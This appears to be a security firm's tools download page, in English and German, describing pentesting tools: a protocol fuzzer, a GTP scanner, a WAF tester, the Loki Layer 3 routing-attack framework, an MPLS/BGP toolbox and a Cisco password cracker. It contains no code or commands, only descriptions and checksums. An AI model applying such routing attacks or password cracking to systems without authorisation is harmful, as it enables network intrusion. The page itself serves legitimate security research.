Tools

dizzy

Python based fuzzing framework

- Can send to L2 as well as to upper layers (TCP/UDP/SCTP)
- Ability to work with odd length packet fields (no need to match byte borders, so even single flags or 7bit long fields can be represented and fuzzed)
- Very easy protocol definition syntax
- Ability to do multi packet state-full fuzzing with the ability to use received target data in response.

Download:
Source - c715a7ba894b44497b98659242fce52128696a17

gtp_scan

Scanner for GPRS tunneling protocol

gtp_scan is a small python script that scans for GTP (GPRS tunneling protocol) speaking hosts. To discover those hosts it uses the GTP build in PING mechanism, it sends a GTP packet of the type ECHO_REQUEST and listens for an incoming GTP ECHO_REPLY. Its capable of generating ECHO_REQUESTS for GTP version 1 and GTP version 2. Also the script can scan for both, GTP-C and GTP-U (the control channel and the user data channel), only the port differs here. In the output the received packet is displayed and the basic GTP header is dissected so one can see a GTP version 1 host answering a GTP version 2 ECHO_REQUEST with the 'version not supported' message. Tests have shown that there are some strange services around, which answer to an GTP ECHO_REQUEST with a lot of weird data, which leads to 'kind of' false positive results but they can easily be discovered by checking the output data with your brain ;) (eg. there is no GTP version 12)

Download:
Source - bbdcc8888ebb4739025395f8c1c253fa5fd2bb15

tsakwaf

The Swiss Army Knife for Web Application Firewalls

The main purpose of tsakwaf is to support the daily work of a web application pentester.

The tool is, amongst other features, capable of fingerprinting different Web Application Firewalls and can be used to test the detection capabilities of a WAF.

Download:
tsakwaf.zip

Loki born at Blackhat USA 2010

"Layer 3 will never be the same again"

Loki - a Python based framework implementing many packet generation and attack modules for Layer 3 protocols, including BGP, LDP, OSPF, VRRP and quite a few others.

The story behind Loki:
"I personally remember the release of Yersinia at Black Hat Europe 2005. It was a ground breaking experience: a number of Layer 2 attacks regarded purely theoretical until then, was suddenly available in a mostly automated way. And those guys even showed some forays completely unbeknownst to me at the time. We plan to do the same in Vegas, with a new tool called Loki (after the giant from Norse mythology associated with cunning, trickery and evil). Layer 3 will never be the same again."

Code/Builds:

Sourcecode:

loki-0.2.7.tar.gz

Gentoo:
loki-0.2.7.ebuild - c29a6cca7a1f7394a473d4b50a1766e9f13fd5a5

Dependencies:
Manifest - 9338ebcc6a3cb58478671f00cac3114efe5df337

Ubuntu 11.04 i386/amd64:
loki_0.2.7-1_i386.deb - bf9fa05aa20677ac209126b78c3829940daaa8ee
loki_0.2.7-1_amd64.deb - 50f5c784f039a15613affd52e304e61fd2a16a58

Dependencies:
pylibpcap_0.6.2-1_i386.deb - e30c9c8ab1a8e1ee3ddedd05475767dc9f85b526
pylibpcap_0.6.2-1_amd64.deb - 9457644ef52fd6bfdb0da8790eee759cc4f76c8b

Fedora 15 i686/amd64:
loki-0.2.7-1.fc15.i686.rpm - 06398d9c8ca5fd0d80b0da65756b01bfe07652b4
loki-0.2.7-1.fc15.x86_64.rpm - 06c1fca3f8390cbe00e8e5c427327379c30222d6

Dependencies:
pylibpcap-0.6.2-1.fc15.i386.rpm - d7e2a9249cba4362d4e435643257ee6a89a412cf
libdnet-python-1.12-7.fc15.i686.rpm - 83bbe3895a58d264190afaef586aba8c2bd921f4
pylibpcap-0.6.2-1.fc15.x86_64.rpm - 62d8cc32ef42211584df439ace8f453a3822d5b1
libdnet-python-1.12-7.fc15.x86_64.rpm - d8e969b35b2b5613f364525f21c8e0738a42e061


Presentation:


Blackhat2010_ERNW_Loki.pdf (7MB)


Videos:


bh10-demos.tar.gz (12MB)


Loki-Wallpaper:


ERNW_loki_wallpaper_1440x900.jpg (549KB)
ERNW_loki_wallpaper_1600x1200.jpg (732KB)

Blackhat Europe 2009 Toolbox

MPLS & BGP-related tools inside

This toolbox was released in line with the presentation of ERNW's talk on backbone security at Black Hat Europe 2009 Briefings. Content of archive: bgp_cli, bgp_md5crack, ldp_cli, mpls_redirect, mpls_tun

SHA-256 Checksum: 01ac15edf87f707b82c1f98f6764409009681b3483b321dbe2a02de896d31e9a

bh09_all_your_packets_tools.tar.bz2

Metrikbasiertes Patchen mit CVSS 2.0 (Newsletter 19 / September 2007)


ERNW_Newsletter_19_CVSS_de.pdf (637KB) Hier erhalten Sie den im Newsletter referenzierten ERNW-CVSS-Calculator
ernw-cvsscalc.zip (198KB)

Dror-John Röcher & Patrice Auffret:

Routing Protocol Security

Dror-John Röcher: ERNW Bulk Switch Config Auditor Tool

Michael Thumann: Too many secrets, aktuelle Version Download

Dieses Tool wurde entwickelt, um "Enable Secret"-Kennwörter von Cisco Routern, Switches und der Cisco PIX zu knacken. Im aktuellen Release arbeitet das Programm mit Brute Forcing, sowie sogenannten Dictionary (Wörterbuch) und Hybrid Angriffen (Kombination aus Dictionary und Brute Force Angriff).

Michael Thumann: DNSDigger

DNSDigger ist ein Tool, welches durch die gleichen Methodiken, die auch beim Password Brute Forcing eingesetzt werden, versucht, soviel Informationen wie möglich von einem DNS Server zu ermitteln.

TROOPERS11 - Neuer Termin
Die TROOPERS12 wird vom 19. - 23. März 2012 in Heidelberg stattfinden. Merken Sie sich schon heute den Termin vor und abonnieren Sie den offiziellen TROOPERS-Newsletter um auf dem neusten Stand zu bleiben. [Mehr]
Penetrationstests
„Ein Penetrations-Test ist der zielgerichtete Versuch, mit den Mitteln eines Angreifers und innerhalb einer gegebenen Zeitspanne Lücken in der IT-Sicherheit aufzudecken.“ [Mehr]
Research & Technologie-Evaluation
Die Arbeit des Research-Teams dient sowohl der internen Weiterbildung als auch unseren Kunden, die durch die Ergebnisse dieser Forschungen Investitionssicherheit erhalten und die allgemeine Sicherheit ihrer IT-Infrastruktur weiter verbessern können. [Mehr]